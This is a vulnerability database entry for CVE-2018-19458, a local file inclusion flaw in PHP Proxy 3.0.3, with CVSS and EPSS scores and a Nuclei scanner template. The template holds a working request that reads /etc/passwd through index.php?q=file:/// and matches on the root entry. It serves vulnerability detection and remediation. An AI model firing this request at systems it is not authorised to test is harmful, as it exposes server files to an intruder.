Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-19458
HistoryAug 02, 2021 - 11:20 p.m.

PHP Proxy 3.0.3 - Local File Inclusion

2021-08-0223:20:58
ProjectDiscovery
github.com
3

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.5 High

AI Score

Confidence

High

0.867 High

EPSS

Percentile

98.6%

PHP Proxy 3.0.3 is susceptible to local file inclusion vulnerabilities that allow unauthenticated users to read files from the server via index.php?q=file:/// (a different vulnerability than CVE-2018-19246).
id: CVE-2018-19458

info:
  name: PHP Proxy 3.0.3 - Local File Inclusion
  author: daffainfo
  severity: high
  description: |
    PHP Proxy 3.0.3 is susceptible to local file inclusion vulnerabilities that allow unauthenticated users to read files from the server via index.php?q=file:/// (a different vulnerability than CVE-2018-19246).
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
  remediation: |
    Upgrade PHP Proxy to a version that is not affected by the vulnerability (3.0.4 or later) or apply the necessary patches provided by the vendor.
  reference:
    - https://www.exploit-db.com/exploits/45780
    - https://pentest.com.tr/exploits/PHP-Proxy-3-0-3-Local-File-Inclusion.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19458
    - https://www.exploit-db.com/exploits/45780/
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-19458
    cwe-id: CWE-287
    epss-score: 0.03301
    epss-percentile: 0.91309
    cpe: cpe:2.3:a:php-proxy:php-proxy:3.0.3:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: php-proxy
    product: php-proxy
  tags: cve,cve2018,edb,lfi,proxy,php-proxy

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?q=file:///etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022011870a0b8c603246e50b7b9233e220338e0bbadfd36d43476eb3a604a8f15909022100fd66dce4ecef6a71328de5d49b7f2c823806736b0f6d62098d105a9fbb5fd37a:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.5 High

AI Score

Confidence

High

0.867 High

EPSS

Percentile

98.6%